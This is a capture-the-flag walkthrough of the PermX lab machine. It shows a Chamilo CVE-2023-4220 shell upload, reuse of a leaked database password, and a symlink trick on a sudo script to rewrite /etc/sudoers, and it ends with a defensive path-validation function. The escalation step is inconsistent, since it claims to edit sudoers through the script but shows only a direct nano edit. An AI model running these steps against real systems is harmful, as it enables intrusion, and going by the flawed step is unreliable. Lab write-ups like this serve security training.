The machine hosts a Chamilo LMS instance vulnerable to CVE‑2023‑4220, allowing unauthenticated file upload and remote code execution. After obtaining a foothold as the web user, database credentials reveal a valid system user. Privilege escalation is achieved by abusing a sudo‑controlled script that follows symlinks.
Target: permx.htb
Initial vector: Chamilo LMS CVE‑2023‑4220 (unauthenticated RCE)
Privilege escalation: insecure sudo script + symlink abuse
Possible usernames (from site content or enumeration):
noah, elsie, ralph, mia, emma, sarah, johny, james
Directory fuzzing reveals:
/lms
The LMS is Chamilo, which is vulnerable to CVE‑2023‑4220.
Use the public exploit to upload a PHP shell:
$ ./CVE-2023-4220.sh -f shell.php -h http://lms.permx.htb -p 443
A reverse shell is obtained. Enumerate the system:
$ id
$ whoami -> www-data
Inspect Chamilo configuration:
$ cat /var/www/chamilo/app/config/configuration.php | grep -C2 password -> chamilo : 03F6lY3uXAP2bkW8
Try the password for local users:
$ su mtz
Password: 03F6lY3uXAP2bkW8
User access obtained.
Check sudo permissions:
$ sudo -l -> allowed to run /opt/acl.sh
The script follows symlinks, allowing arbitrary file modification.
Exploit this by pointing a symlink at /etc/sudoers.
Create the symlink:
$ ln -s /etc/sudoers /home/mtz/LINK
Edit the sudoers file through the vulnerable script:
$ nano /etc/sudoers # Add: mtz ALL=(ALL:ALL) NOPASSWD:ALL
Now escalate:
$ sudo bash
# id
# whoami -> root
PermX combines a straightforward Chamilo RCE with a simple but effective symlink‑based privilege escalation.
After exploiting CVE‑2023‑4220 to gain initial access, the vulnerable acl.sh script allows modification of /etc/sudoers, resulting in full system compromise.
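The escalation works because a script run as root through sudo acts on a user-controlled path without resolving it first. As an added example (not the contents of /opt/acl.sh, which this page does not show, and not code from the original write-up), this is the kind of path check such a helper can perform before touching a file; ALLOWED_BASE and safe_target are hypothetical names, and GNU realpath and stat are assumed.

```shell
#!/usr/bin/env bash
# Added example: path validation for a root-run helper that receives a
# file path from an unprivileged user. Hypothetical names throughout.

ALLOWED_BASE="${ALLOWED_BASE:-/home/mtz}"   # assumption: the only tree the helper may touch

# Prints the canonical path and returns 0 only when the target is a regular,
# non-symlink file whose fully resolved location lies inside ALLOWED_BASE.
safe_target() {
    local target="$1" base resolved
    base="$(realpath -e -- "$ALLOWED_BASE")" || return 1

    # Reject a symlink as the final path component.
    [ -L "$target" ] && { echo "reject: symlink: $target" >&2; return 1; }

    # Resolve every component (symlinked parent directories, ../ segments).
    resolved="$(realpath -e -- "$target" 2>/dev/null)" || {
        echo "reject: cannot resolve: $target" >&2; return 1; }

    # Compare the resolved path, not the string the caller supplied.
    case "$resolved" in
        "$base"/*) ;;
        *) echo "reject: outside $base: $resolved" >&2; return 1 ;;
    esac

    # Regular files only; a link count above 1 may be a hard link to a file elsewhere.
    [ -f "$resolved" ] || { echo "reject: not a regular file: $resolved" >&2; return 1; }
    [ "$(stat -c %h -- "$resolved")" -eq 1 ] || {
        echo "reject: multiple hard links: $resolved" >&2; return 1; }

    printf '%s\n' "$resolved"
}
```

The check and the later file operation are not atomic, so the helper should act on the canonical path this function returns rather than on the original argument.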